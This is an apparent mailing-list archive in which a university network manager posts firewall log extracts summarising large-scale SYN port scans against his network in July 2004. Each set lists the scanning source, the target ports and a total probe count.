Jul 4 00:58:29 61.138.108.243:3428 -> xxx.yyy.194.72:9898 SYN ******S*
Jul 4 00:58:29 61.138.108.243:3425 -> xxx.yyy.194.70:9898 SYN ******S*
Jul 4 00:58:29 61.138.108.243:3424 -> xxx.yyy.194.69:9898 SYN ******S*
Jul 4 00:58:29 61.138.108.243:3401 -> xxx.yyy.194.63:9898 SYN ******S*
Jul 4 00:58:29 61.138.108.243:3405 -> xxx.yyy.194.64:9898 SYN ******S*
Jul 4 00:58:29 61.138.108.243:3413 -> xxx.yyy.194.66:9898 SYN ******S*
Jul 4 00:58:29 61.138.108.243:3404 -> xxx.yyy.194.65:9898 SYN ******S*
Jul 4 00:58:29 61.138.108.243:3399 -> xxx.yyy.194.62:9898 SYN ******S*
13743

Jul 4 23:56:10 60.34.16.192:2040 -> xxx.yyy.174.2:5554 SYN ******S*
Jul 4 23:56:11 60.34.16.192:2768 -> xxx.yyy.174.2:1023 SYN ******S*
Jul 4 23:56:13 60.34.16.192:4657 -> xxx.yyy.174.2:9898 SYN ******S*
Jul 4 23:56:10 60.34.16.192:2041 -> xxx.yyy.174.3:5554 SYN ******S*
Jul 4 23:56:11 60.34.16.192:2749 -> xxx.yyy.174.3:1023 SYN ******S*
Jul 4 23:56:13 60.34.16.192:4600 -> xxx.yyy.174.3:9898 SYN ******S*
Jul 4 23:56:10 60.34.16.192:2059 -> xxx.yyy.174.4:5554 SYN ******S*
Jul 4 23:56:11 60.34.16.192:2796 -> xxx.yyy.174.4:1023 SYN ******S*
[...]
Jul 4 23:56:54 60.34.16.192:3152 -> xxx.yyy.194.122:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3153 -> xxx.yyy.194.114:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3158 -> xxx.yyy.194.100:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3162 -> xxx.yyy.194.112:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3159 -> xxx.yyy.194.108:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3160 -> xxx.yyy.194.109:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3172 -> xxx.yyy.194.116:9898 SYN ******S* Jul 4 23:56:54 60.34.16.192:3173 -> xxx.yyy.194.118:9898 SYN ******S* 13613 Jul 4 00:56:58 218.61.144.160:1986 -> xxx.yyy.154.100:5554 SYN ******S* Jul 4 00:56:59 218.61.144.160:2620 -> xxx.yyy.154.100:1023 SYN ******S* Jul 4 00:57:01 218.61.144.160:3820 -> xxx.yyy.154.100:9898 SYN ******S* Jul 4 00:56:58 218.61.144.160:1988 -> xxx.yyy.154.102:5554 SYN ******S* Jul 4 00:56:59 218.61.144.160:2622 -> xxx.yyy.154.102:1023 SYN ******S* Jul 4 00:57:01 218.61.144.160:3824 -> xxx.yyy.154.102:9898 SYN ******S* Jul 4 00:56:58 218.61.144.160:1987 -> xxx.yyy.154.101:5554 SYN ******S* Jul 4 00:56:59 218.61.144.160:2621 -> xxx.yyy.154.101:1023 SYN ******S* [...] 
Jul 4 00:57:40 218.61.144.160:2947 -> xxx.yyy.174.162:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2952 -> xxx.yyy.174.163:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2953 -> xxx.yyy.174.164:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2954 -> xxx.yyy.174.165:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2957 -> xxx.yyy.174.166:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2958 -> xxx.yyy.174.167:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2959 -> xxx.yyy.174.168:9898 SYN ******S* Jul 4 00:57:40 218.61.144.160:2960 -> xxx.yyy.174.169:9898 SYN ******S* 12206 Jul 4 00:56:40 61.51.119.171:2880 -> xxx.yyy.72.124:5554 SYN ******S* Jul 4 00:56:41 61.51.119.171:3375 -> xxx.yyy.72.124:1023 SYN ******S* Jul 4 00:56:43 61.51.119.171:4435 -> xxx.yyy.72.124:9898 SYN ******S* Jul 4 00:56:40 61.51.119.171:2882 -> xxx.yyy.72.126:5554 SYN ******S* Jul 4 00:56:41 61.51.119.171:3378 -> xxx.yyy.72.126:1023 SYN ******S* Jul 4 00:56:43 61.51.119.171:4441 -> xxx.yyy.72.126:9898 SYN ******S* Jul 4 00:56:40 61.51.119.171:2881 -> xxx.yyy.72.125:5554 SYN ******S* Jul 4 00:56:41 61.51.119.171:3376 -> xxx.yyy.72.125:1023 SYN ******S* [...] 
Jul 4 00:57:32 61.51.119.171:1065 -> xxx.yyy.73.46:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1064 -> xxx.yyy.73.45:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1066 -> xxx.yyy.73.47:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1067 -> xxx.yyy.73.48:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1082 -> xxx.yyy.73.49:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1081 -> xxx.yyy.73.43:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1162 -> xxx.yyy.73.50:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1225 -> xxx.yyy.73.51:9898 SYN ******S* Jul 4 00:57:32 61.51.119.171:1226 -> xxx.yyy.73.52:9898 SYN ******S* 12061 Jul 4 23:55:57 61.41.94.19:4527 -> xxx.yyy.214.246:5554 SYN ******S* Jul 4 23:55:58 61.41.94.19:2317 -> xxx.yyy.214.246:1023 SYN ******S* Jul 4 23:56:00 61.41.94.19:4367 -> xxx.yyy.214.246:9898 SYN ******S* Jul 4 23:55:57 61.41.94.19:4530 -> xxx.yyy.214.248:5554 SYN ******S* Jul 4 23:55:58 61.41.94.19:2365 -> xxx.yyy.214.248:1023 SYN ******S* Jul 4 23:56:00 61.41.94.19:4388 -> xxx.yyy.214.248:9898 SYN ******S* Jul 4 23:55:57 61.41.94.19:4528 -> xxx.yyy.214.247:5554 SYN ******S* Jul 4 23:55:58 61.41.94.19:2334 -> xxx.yyy.214.247:1023 SYN ******S* [...] 
Jul 4 23:56:50 61.41.94.19:2319 -> xxx.yyy.235.85:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2317 -> xxx.yyy.235.84:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2343 -> xxx.yyy.235.86:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2603 -> xxx.yyy.235.88:9898 SYN ******S* Jul 4 23:56:50 61.41.94.19:2683 -> xxx.yyy.235.89:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:2866 -> xxx.yyy.235.93:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:3236 -> xxx.yyy.235.57:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:3227 -> xxx.yyy.235.102:9898 SYN ******S* Jul 4 23:56:51 61.41.94.19:3295 -> xxx.yyy.235.59:9898 SYN ******S* 11778 Jul 4 00:17:42 61.229.9.30:3428 -> xxx.yyy.1.12:8000 SYN ******S* Jul 4 00:17:39 61.229.9.30:3431 -> xxx.yyy.1.13:8000 SYN ******S* Jul 4 00:17:39 61.229.9.30:3456 -> xxx.yyy.1.21:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3496 -> xxx.yyy.1.39:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3506 -> xxx.yyy.1.44:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3584 -> xxx.yyy.1.65:8000 SYN ******S* Jul 4 00:17:40 61.229.9.30:3589 -> xxx.yyy.1.67:8000 SYN ******S* Jul 4 00:17:43 61.229.9.30:3668 -> xxx.yyy.1.93:8000 SYN ******S* [...] 
Jul 4 00:33:20 61.229.9.30:4122 -> xxx.yyy.255.146:8000 SYN ******S* Jul 4 00:33:20 61.229.9.30:4149 -> xxx.yyy.255.151:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4226 -> xxx.yyy.255.169:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4260 -> xxx.yyy.255.175:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4263 -> xxx.yyy.255.176:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4350 -> xxx.yyy.255.202:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4362 -> xxx.yyy.255.207:8000 SYN ******S* Jul 4 00:33:21 61.229.9.30:4372 -> xxx.yyy.255.214:8000 SYN ******S* Jul 4 00:33:22 61.229.9.30:4436 -> xxx.yyy.255.227:8000 SYN ******S* 11663 Jul 4 00:55:56 221.202.234.125:2325 -> xxx.yyy.133.234:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3247 -> xxx.yyy.133.234:9898 SYN ******S* Jul 4 00:55:56 221.202.234.125:2327 -> xxx.yyy.133.236:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3249 -> xxx.yyy.133.236:9898 SYN ******S* Jul 4 00:55:56 221.202.234.125:2326 -> xxx.yyy.133.235:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3248 -> xxx.yyy.133.235:9898 SYN ******S* Jul 4 00:55:56 221.202.234.125:2331 -> xxx.yyy.133.244:1023 SYN ******S* Jul 4 00:55:58 221.202.234.125:3253 -> xxx.yyy.133.244:9898 SYN ******S* [...] 
Jul 4 00:56:45 221.202.234.125:3545 -> xxx.yyy.154.86:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3554 -> xxx.yyy.154.96:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3549 -> xxx.yyy.154.90:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3556 -> xxx.yyy.154.98:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3552 -> xxx.yyy.154.93:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3553 -> xxx.yyy.154.95:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3557 -> xxx.yyy.154.99:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3555 -> xxx.yyy.154.97:9898 SYN ******S* Jul 4 00:56:45 221.202.234.125:3558 -> xxx.yyy.154.100:9898 SYN ******S* 9887 Jul 4 00:56:38 61.49.210.205:3209 -> xxx.yyy.215.210:5554 SYN ******S* Jul 4 00:56:38 61.49.210.205:3213 -> xxx.yyy.215.213:5554 SYN ******S* Jul 4 00:56:39 61.49.210.205:4699 -> xxx.yyy.215.213:1023 SYN ******S* Jul 4 00:56:38 61.49.210.205:3232 -> xxx.yyy.215.218:5554 SYN ******S* Jul 4 00:56:38 61.49.210.205:3220 -> xxx.yyy.215.214:5554 SYN ******S* Jul 4 00:56:39 61.49.210.205:4701 -> xxx.yyy.215.214:1023 SYN ******S* Jul 4 00:56:41 61.49.210.205:2602 -> xxx.yyy.215.214:9898 SYN ******S* Jul 4 00:56:38 61.49.210.205:3234 -> xxx.yyy.215.221:5554 SYN ******S* [...] 
Jul 4 00:57:22 61.49.210.205:3043 -> xxx.yyy.236.67:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3041 -> xxx.yyy.236.66:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3038 -> xxx.yyy.236.64:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3072 -> xxx.yyy.236.71:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3074 -> xxx.yyy.236.73:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3075 -> xxx.yyy.236.72:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3085 -> xxx.yyy.236.76:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3104 -> xxx.yyy.236.74:9898 SYN ******S* Jul 4 00:57:22 61.49.210.205:3105 -> xxx.yyy.236.75:9898 SYN ******S* 8633 Jul 4 00:52:28 220.184.105.41:3859 -> xxx.yyy.92.26:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3865 -> xxx.yyy.92.27:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3871 -> xxx.yyy.92.32:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3875 -> xxx.yyy.92.34:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3876 -> xxx.yyy.92.37:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3874 -> xxx.yyy.92.43:5554 SYN ******S* Jul 4 00:52:26 220.184.105.41:3882 -> xxx.yyy.92.46:5554 SYN ******S* Jul 4 00:52:29 220.184.105.41:3888 -> xxx.yyy.92.49:5554 SYN ******S* [...] 
Jul 4 01:10:07 220.184.105.41:1182 -> xxx.yyy.111.236:9898 SYN ******S* Jul 4 01:10:08 220.184.105.41:1188 -> xxx.yyy.111.239:9898 SYN ******S* Jul 4 01:10:08 220.184.105.41:1193 -> xxx.yyy.111.240:9898 SYN ******S* Jul 4 01:10:08 220.184.105.41:1199 -> xxx.yyy.111.242:9898 SYN ******S* Jul 4 01:10:09 220.184.105.41:1209 -> xxx.yyy.111.244:9898 SYN ******S* Jul 4 01:10:09 220.184.105.41:1225 -> xxx.yyy.111.247:9898 SYN ******S* Jul 4 01:10:10 220.184.105.41:1245 -> xxx.yyy.111.252:9898 SYN ******S* Jul 4 01:10:11 220.184.105.41:1267 -> xxx.yyy.111.255:9898 SYN ******S* 8307 Jul 4 00:57:02 221.202.6.137:1197 -> xxx.yyy.175.88:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2104 -> xxx.yyy.175.88:9898 SYN ******S* Jul 4 00:57:02 221.202.6.137:1200 -> xxx.yyy.175.90:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2105 -> xxx.yyy.175.90:9898 SYN ******S* Jul 4 00:57:02 221.202.6.137:1201 -> xxx.yyy.175.91:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2106 -> xxx.yyy.175.91:9898 SYN ******S* Jul 4 00:57:02 221.202.6.137:1202 -> xxx.yyy.175.92:1023 SYN ******S* Jul 4 00:57:04 221.202.6.137:2107 -> xxx.yyy.175.92:9898 SYN ******S* [...] 
Jul 4 00:57:44 221.202.6.137:2075 -> xxx.yyy.176.142:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2076 -> xxx.yyy.176.143:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2077 -> xxx.yyy.176.144:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2079 -> xxx.yyy.176.146:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2080 -> xxx.yyy.176.147:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2082 -> xxx.yyy.176.149:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2078 -> xxx.yyy.176.145:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2081 -> xxx.yyy.176.148:9898 SYN ******S* Jul 4 00:57:44 221.202.6.137:2083 -> xxx.yyy.176.150:9898 SYN ******S* 8179 Jul 4 03:08:48 132.236.46.125:2663 -> xxx.yyy.1.2:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2664 -> xxx.yyy.1.3:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2665 -> xxx.yyy.1.4:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2666 -> xxx.yyy.1.5:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2667 -> xxx.yyy.1.6:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2668 -> xxx.yyy.1.7:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2669 -> xxx.yyy.1.8:139 SYN ******S* Jul 4 03:08:48 132.236.46.125:2670 -> xxx.yyy.1.9:139 SYN ******S* [...] 
Jul 4 03:37:31 132.236.46.125:4090 -> xxx.yyy.32.245:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4095 -> xxx.yyy.32.248:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4102 -> xxx.yyy.32.252:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4098 -> xxx.yyy.32.249:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4099 -> xxx.yyy.32.250:139 SYN ******S* Jul 4 03:37:31 132.236.46.125:4100 -> xxx.yyy.32.251:139 SYN ******S* Jul 4 03:37:32 132.236.46.125:4110 -> xxx.yyy.32.253:139 SYN ******S* Jul 4 03:37:32 132.236.46.125:4111 -> xxx.yyy.32.254:139 SYN ******S* 8126 Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.3:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.4:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.5:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.6:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.7:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.8:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.9:139 SYN ******S* Jul 4 12:39:48 82.64.151.21:27938 -> xxx.yyy.192.10:139 SYN ******S* [...] 
--
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From Ken.Connelly at uni.edu Tue Jul 6 16:19:14 2004
From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu)
Date: Tue, 06 Jul 2004 11:19:14 -0500 (CDT)
Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects
Message-ID: <01LC50VDGAMC8YBZ2Y@uni.edu>

The following extracts show the beginning and ending of scan activity that was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500.
Jul 5 12:48:59 82.39.40.106:2584 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 12:48:59 82.39.40.106:2600 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 12:48:59 82.39.40.106:2604 -> xxx.yyy.255.249:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2608 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2612 -> xxx.yyy.255.251:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2616 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2617 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 12:49:00 82.39.40.106:2627 -> xxx.yyy.255.254:1433 SYN ******S* 122618 Jul 5 07:28:35 24.225.241.169:3837 -> xxx.yyy.1.0:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3838 -> xxx.yyy.1.1:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3839 -> xxx.yyy.1.2:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3841 -> xxx.yyy.1.3:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3842 -> xxx.yyy.1.4:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3843 -> xxx.yyy.1.5:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3844 -> xxx.yyy.1.6:139 SYN ******S* Jul 5 07:28:35 24.225.241.169:3848 -> xxx.yyy.1.7:139 SYN ******S* [...] 
Jul 5 07:50:38 24.225.241.169:1377 -> xxx.yyy.255.248:139 SYN ******S* Jul 5 07:50:38 24.225.241.169:1361 -> xxx.yyy.255.245:139 SYN ******S* Jul 5 07:50:38 24.225.241.169:1376 -> xxx.yyy.255.247:139 SYN ******S* Jul 5 07:50:38 24.225.241.169:1385 -> xxx.yyy.255.249:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1402 -> xxx.yyy.255.253:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1401 -> xxx.yyy.255.252:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1404 -> xxx.yyy.255.254:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1387 -> xxx.yyy.255.250:139 SYN ******S* Jul 5 07:50:39 24.225.241.169:1391 -> xxx.yyy.255.251:139 SYN ******S* 121278 Jul 5 21:04:36 64.231.162.117:1137 -> xxx.yyy.1.1:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1138 -> xxx.yyy.1.2:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1139 -> xxx.yyy.1.3:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1140 -> xxx.yyy.1.4:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1142 -> xxx.yyy.1.5:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1144 -> xxx.yyy.1.6:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1146 -> xxx.yyy.1.7:139 SYN ******S* Jul 5 21:04:36 64.231.162.117:1148 -> xxx.yyy.1.8:139 SYN ******S* [...] 
Jul 5 23:59:59 64.231.162.117:1093 -> xxx.yyy.184.8:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1094 -> xxx.yyy.184.9:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1095 -> xxx.yyy.184.10:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1096 -> xxx.yyy.184.11:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1097 -> xxx.yyy.184.12:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1098 -> xxx.yyy.184.13:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1099 -> xxx.yyy.184.14:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1100 -> xxx.yyy.184.15:139 SYN ******S* Jul 5 23:59:59 64.231.162.117:1101 -> xxx.yyy.184.16:139 SYN ******S* 74060 Jul 5 15:34:43 67.11.206.12:1053 -> xxx.yyy.1.1:6129 SYN ******S* Jul 5 15:34:43 67.11.206.12:1054 -> xxx.yyy.1.2:6129 SYN ******S* Jul 5 15:34:43 67.11.206.12:1055 -> xxx.yyy.1.3:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1056 -> xxx.yyy.1.4:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1057 -> xxx.yyy.1.5:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1058 -> xxx.yyy.1.6:6129 SYN ******S* Jul 5 15:34:42 67.11.206.12:1059 -> xxx.yyy.1.7:6129 SYN ******S* Jul 5 15:34:45 67.11.206.12:1060 -> xxx.yyy.1.8:6129 SYN ******S* [...] 
Jul 5 15:45:39 67.11.206.12:3574 -> xxx.yyy.255.160:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3578 -> xxx.yyy.255.164:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3579 -> xxx.yyy.255.165:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3582 -> xxx.yyy.255.168:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3580 -> xxx.yyy.255.166:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3581 -> xxx.yyy.255.167:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3583 -> xxx.yyy.255.169:6129 SYN ******S* Jul 5 15:45:39 67.11.206.12:3584 -> xxx.yyy.255.170:6129 SYN ******S* 72699 Jul 5 18:27:16 66.226.210.162:2448 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2449 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 18:27:13 66.226.210.162:2450 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 18:27:13 66.226.210.162:2451 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2452 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2453 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2455 -> xxx.yyy.1.8:1433 SYN ******S* Jul 5 18:27:16 66.226.210.162:2456 -> xxx.yyy.1.9:1433 SYN ******S* [...] 
Jul 5 18:38:54 66.226.210.162:1549 -> xxx.yyy.255.248:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1553 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1550 -> xxx.yyy.255.249:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1554 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1545 -> xxx.yyy.255.244:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1551 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1546 -> xxx.yyy.255.245:1433 SYN ******S* Jul 5 18:38:54 66.226.210.162:1552 -> xxx.yyy.255.251:1433 SYN ******S* 72453 Jul 5 20:36:41 151.36.102.55:1999 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2000 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2001 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2002 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2003 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2004 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2005 -> xxx.yyy.1.7:1433 SYN ******S* Jul 5 20:36:41 151.36.102.55:2006 -> xxx.yyy.1.8:1433 SYN ******S* [...] 
Jul 5 21:07:11 151.36.102.55:2098 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 21:07:11 151.36.102.55:2099 -> xxx.yyy.255.254:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2091 -> xxx.yyy.255.246:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2092 -> xxx.yyy.255.247:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2095 -> xxx.yyy.255.250:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2096 -> xxx.yyy.255.251:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2097 -> xxx.yyy.255.252:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2098 -> xxx.yyy.255.253:1433 SYN ******S* Jul 5 21:07:14 151.36.102.55:2099 -> xxx.yyy.255.254:1433 SYN ******S* 72186 Jul 5 17:00:45 192.203.200.67:1070 -> xxx.yyy.1.1:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1071 -> xxx.yyy.1.2:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1072 -> xxx.yyy.1.3:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1073 -> xxx.yyy.1.4:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1074 -> xxx.yyy.1.5:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1075 -> xxx.yyy.1.6:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1076 -> xxx.yyy.1.7:1433 SYN ******S* Jul 5 17:00:45 192.203.200.67:1077 -> xxx.yyy.1.8:1433 SYN ******S* [...] 
Jul 5 17:12:25 192.203.200.67:3202 -> xxx.yyy.255.222:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3203 -> xxx.yyy.255.223:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3204 -> xxx.yyy.255.224:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3205 -> xxx.yyy.255.225:1433 SYN ******S* Jul 5 17:12:25 192.203.200.67:3206 -> xxx.yyy.255.226:1433 SYN ******S* Jul 5 17:12:26 192.203.200.67:3210 -> xxx.yyy.255.230:1433 SYN ******S* Jul 5 17:12:26 192.203.200.67:3211 -> xxx.yyy.255.231:1433 SYN ******S* Jul 5 17:12:26 192.203.200.67:3212 -> xxx.yyy.255.232:1433 SYN ******S* 72169 Jul 5 01:04:59 192.135.10.148:4914 -> xxx.yyy.1.1:8000 SYN ******S* Jul 5 01:04:59 192.135.10.148:4916 -> xxx.yyy.1.2:8000 SYN ******S* Jul 5 01:04:59 192.135.10.148:4917 -> xxx.yyy.1.3:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4918 -> xxx.yyy.1.4:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4919 -> xxx.yyy.1.5:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4920 -> xxx.yyy.1.6:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4922 -> xxx.yyy.1.7:8000 SYN ******S* Jul 5 01:04:58 192.135.10.148:4923 -> xxx.yyy.1.8:8000 SYN ******S* [...] 
Jul 5 01:14:15 192.135.10.148:2529 -> xxx.yyy.zzz.247:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2530 -> xxx.yyy.zzz.248:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2531 -> xxx.yyy.zzz.249:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2532 -> xxx.yyy.zzz.250:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2533 -> xxx.yyy.zzz.251:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2534 -> xxx.yyy.zzz.252:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2537 -> xxx.yyy.zzz.253:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2538 -> xxx.yyy.zzz.254:8000 SYN ******S* Jul 5 01:14:15 192.135.10.148:2460 -> xxx.yyy.zzz.191:8000 SYN ******S* 70712 Jul 5 15:30:23 206.13.56.94:1038 -> xxx.yyy.1.1:80 SYN ******S* Jul 5 15:30:23 206.13.56.94:1041 -> xxx.yyy.1.2:80 SYN ******S* Jul 5 15:30:23 206.13.56.94:1044 -> xxx.yyy.1.3:80 SYN ******S* Jul 